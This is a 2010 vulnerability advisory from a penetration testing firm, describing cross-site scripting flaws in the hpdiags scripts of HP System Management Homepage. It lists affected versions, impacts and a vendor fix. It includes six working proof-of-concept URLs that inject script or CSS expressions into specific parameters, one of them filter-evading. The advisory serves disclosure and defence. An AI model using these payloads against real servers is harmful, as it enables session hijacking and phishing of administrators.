New Banner 2

Services

Find out more about ProCheckUp's services including: Penetration Testing, PCI QSA and PCI ASV

Request a Callback

PR10-05 - XSS injection vulnerability within HP System Management Homepage (Formally Insight Manager)

Vulnerability found:
08 February 2010
Vendor informed:
09 February 2010
Severity level:
Medium
Credits:
Richard Brain of ProCheckUp Ltd (www.procheckup.com)
Description:
An XSS vulnerability has been found within HP system management for HP servers; this arises from insufficient input filtering found within the hpdiags suite of programs. The hpdiags suite of programs was found to be present within Linux versions of HP system management.

By using a specially-crafted link, and tricking the victim into clicking on it, an attacker can perform malicious attacks such as the following:
- Hijack user accounts by stealing the victim's cookies that are assigned to the victim's browser by the vulnerable website
- Hijack user accounts by injecting a "fake" html form on the html rendered by the victim's web browser
- Redirect the victim to a malicious third-party website which would perform a phishing attack to steal the user credentials or exploit an vulnerability (i.e.: buffer overflow) on the victim's web browser in order to compromise the victim's workstation.

Notes:
Authentication is normally needed, unless system has been configured to support anonymous automatic login.

Successfully tested on:
System Management Homepage
Version v3.0.0.68
Version v3.0.2.77
Version v6.1.0.103

Tested on Centos/Red Hat enterprise operating system, running on HP Proliant DL380 G5 and DL360 G5 servers
Proof of concept:
The following works with Internet Explorer only
https:///target-domain.foo:2381/hpdiags/parameters.php?device="</XSS STYLE=xss:expression(location='http://www.procheckup.com')>
Versions:- 3.0.0.68, 6.0.0.95 linux, 6.1.0.103 linux

https://target-domain.foo:2381/hpdiags/idstatusframe.php?pid="%20</XSS STYLE=xss:expression(location='http://www.procheckup.com')>
Versions:- 3.0.0.68, 6.0.0.95 linux, 6.1.0.103 linux

Same program as above thoguh with another variable
https://target-domain.foo:2381/hpdiags/idstatusframe.php?cfg="%20</XSS STYLE=xss:expression(location='http://www.procheckup.com')>
Versions:- 3.0.0.68 linux, 6.0.0.95 linux, 6.1.0.103 linux

https://target-domain.foo:2381/hpdiags/survey.php?category=");//}</XSS/*-*/STYLE=xss:e/**/xpression(location='http://www.procheckup.com')>&device=1&filename=Procheckup&mount=1&save=1&surveyLevel=1&target=1
Versions:- 3.0.0.68 linux

https://target-domain.foo:2381/hpdiags/globals.php?tabpage=";alert(1)//
Versions:- 3.0.0.68 linux

https://target-domain.foo:2381/hpdiags/custom.php?testMode=blah';</XSS%20STYLE=xss:expression(location='http://www.procheckup.com')>
Versions:- 3.0.0.68 linux

Consequences:
Attackers can force the victim's web browser to perform XSS/HTML injection in the security context of the vulnerable site in order to gather data from users who visit a page within the target site.
How to fix:
HP have now issued a fix, download the appropriate update for your operating system ensuring the system management agent is at least version x or above.

See HP URL: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02492472
Legal:
Copyright 2010 ProCheckUp Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if the Bulletin is not changed or edited in any way, is attributed to ProCheckUp indicating this web page URL, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. ProCheckUp is not liable for any misuse of this information by any third party. ProCheckUp is not responsible for the content of external Internet sites.
Back to Vulnerabilities List